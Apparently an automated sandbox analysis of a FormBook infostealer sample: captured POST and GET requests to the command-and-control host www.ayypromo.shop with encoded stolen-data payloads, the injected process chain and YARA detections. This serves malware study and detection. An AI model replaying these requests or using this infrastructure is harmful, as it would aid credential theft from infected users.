                                      Aug 26, 2024 18:29:20.825375080 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.449767176.57.64.102805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:34.033292055 CEST748OUTPOST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 58 52 38 65 6c 49 30 49 6f 35 58 6b 4f 39 42 69 36 51 54 32 50 6c 45 57 64 4d 59 33 36 76 4a 36 77 3d 3d
                                      Data Ascii: 3L9l=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
                                      Aug 26, 2024 18:29:34.702248096 CEST749INHTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=gIrdR1B1Q86dlX2I5Y9n; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:34 GMT
                                      Date: Mon, 26 Aug 2024 16:29:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.449768176.57.64.102805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:36.587841034 CEST768OUTPOST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                                      Data Ascii: 3L9l=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
                                      Aug 26, 2024 18:29:37.448333979 CEST749INHTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=qcu0yVM64DDVZF4bCVJ1; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:37 GMT
                                      Date: Mon, 26 Aug 2024 16:29:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.449769176.57.64.102805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:39.131866932 CEST10850OUTPOST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 [TRUNCATED]
                                      Data Ascii: 3L9l=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnbNw2PcvXr5/853DhYfB7xNkj9oHHjElCweHYo+ME+xMhmxaR63MJ36kUqht80gRvsxAEICgHEmCJt7d076bpVUxulBXTfrt4H+HCypUTCqBiX8PhUghK9O1KGSPrkFhof90ZZfm9LS2JxYhaftU8gCMjIr39UqIpDeKx6HflYx0y49EFCsKsQtgWfS5I9rkvrNGxzlXF7eApF1CQD19JAQitKRH5dHq9kJcmnAPkkMq+aGmQBF+D3yglJcz2eKIF2YhishDGWW+EGRMH6QnBth0LzsF5aSG3Xc8x+PHeJ3jixmEQV0REcEOmAqHXYcEzBS1o5Ekq/VZyQOB73195TME3MZgOQKbmMop5gag5Y6Eh0Rbvn40eOZvo7ezA6Kv0fqTCjQSggLxyJ9lomL6MOdrbgR7V2LyxyM+/mBZj8IJWTuFLLpJe7RIfnO67iYZe9BRnKFbYECvfJ6UE0xe7I3B4wY/COK6fVCSavV0O5u5C7rKUTJxdwft8OUF2QAH+x7GwWIQwBL662Db5iNa2/Y+5DcY0fvap4jRdYVbVeBrepuFqDvZEUXNbQQ+kniTFCJAYfBKrsGVb+hpNepyZ6TS1jf2bRaWsvCX7vWjgWFaXIXjybLUVgCWR6GKOYSyIl6L4SP5UlPkyHLgQdsbW3x9oJtr4q8sHavr29S0+XYeCdjxCHRDz2tz4Ga8lCnIWn+Ex4IhxJiuS++BlKwxWTTAV73HEf78mieFzT6fYMZAJAhngeHQZ5ahPa0bzhxy4mUjvd/bzXiD9uDSsn+rodTSCWJlbUAng/6+loRHMQElV4Xywc3v7M4jO1qCZE1 [TRUNCATED]
                                      Aug 26, 2024 18:29:39.827151060 CEST749INHTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=fVu3sRgjivEndIImLJFH; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:39 GMT
                                      Date: Mon, 26 Aug 2024 16:29:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.449770176.57.64.102805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:42.069953918 CEST483OUTGET /rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:42.704710960 CEST727INHTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=4zeL29F342mINNAYsAPa; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:42 GMT
                                      Date: Mon, 26 Aug 2024 16:29:42 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:26:35
                                      Start date:26/08/2024
                                      Path:C:\Users\user\Desktop\031215-Revised-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\031215-Revised-01.exe"
                                      Imagebase:0x70000
                                      File size:1'276'416 bytes
                                      MD5 hash:1BF161B2BC2C8EFDDF6FBC402DFB9508
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:12:26:43
                                      Start date:26/08/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\031215-Revised-01.exe"
                                      Imagebase:0x1e0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:12:27:11
                                      Start date:26/08/2024
                                      Path:C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
                                      Imagebase:0xe60000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:6
                                      Start time:12:27:13
                                      Start date:26/08/2024
                                      Path:C:\Windows\SysWOW64\rasdial.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                      Imagebase:0x3f0000
                                      File size:19'456 bytes
                                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:8
                                      Start time:12:27:26
                                      Start date:26/08/2024
                                      Path:C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe"
                                      Imagebase:0xe60000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:9
                                      Start time:12:27:38
                                      Start date:26/08/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff6bf500000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:70
                                        execution_graph 95294 71044 95299 710f3 95294->95299 95296 7104a 95335 900a3 29 API calls __onexit 95296->95335 95298 71054 95336 71398 95299->95336 95303 7116a 95346 7a961 95303->95346 95306 7a961 22 API calls 95307 7117e 95306->95307 95308 7a961 22 API calls 95307->95308 95309 71188 95308->95309 95310 7a961 22 API calls 95309->95310 95311 711c6 95310->95311 95312 7a961 22 API calls 95311->95312 95313 71292 95312->95313 95351 7171c 95313->95351 95317 712c4 95318 7a961 22 API calls 95317->95318 95319 712ce 95318->95319 95372 81940 95319->95372 95321 712f9 95382 71aab 95321->95382 95323 71315 95324 71325 GetStdHandle 95323->95324 95325 b2485 95324->95325 95326 7137a 95324->95326 95325->95326 95327 b248e 95325->95327 95329 71387 OleInitialize 95326->95329 95389 8fddb 95327->95389 95329->95296 95330 b2495 95399 e011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95330->95399 95332 b249e 95400 e0944 CreateThread 95332->95400 95334 b24aa CloseHandle 95334->95326 95335->95298 95401 713f1 95336->95401 95339 713f1 22 API calls 95340 713d0 95339->95340 95341 7a961 22 API calls 95340->95341 95342 713dc 95341->95342 95408 76b57 95342->95408 95344 71129 95345 71bc3 6 API calls 95344->95345 95345->95303 95347 8fe0b 22 API calls 95346->95347 95348 7a976 95347->95348 95349 8fddb 22 API calls 95348->95349 95350 71174 95349->95350 95350->95306 95352 7a961 22 API calls 95351->95352 95353 7172c 95352->95353 95354 7a961 22 API calls 95353->95354 95355 71734 95354->95355 95356 7a961 22 API calls 95355->95356 95357 7174f 95356->95357 95358 8fddb 22 API calls 95357->95358 95359 7129c 95358->95359 95360 71b4a 95359->95360 95361 71b58 95360->95361 95362 7a961 22 API calls 95361->95362 95363 71b63 95362->95363 95364 7a961 22 API calls 95363->95364 95365 71b6e 95364->95365 95366 7a961 22 API calls 95365->95366 95367 71b79 95366->95367 95368 7a961 22 API calls 95367->95368 95369 71b84 95368->95369 95370 8fddb 22 API calls 95369->95370 95371 71b96 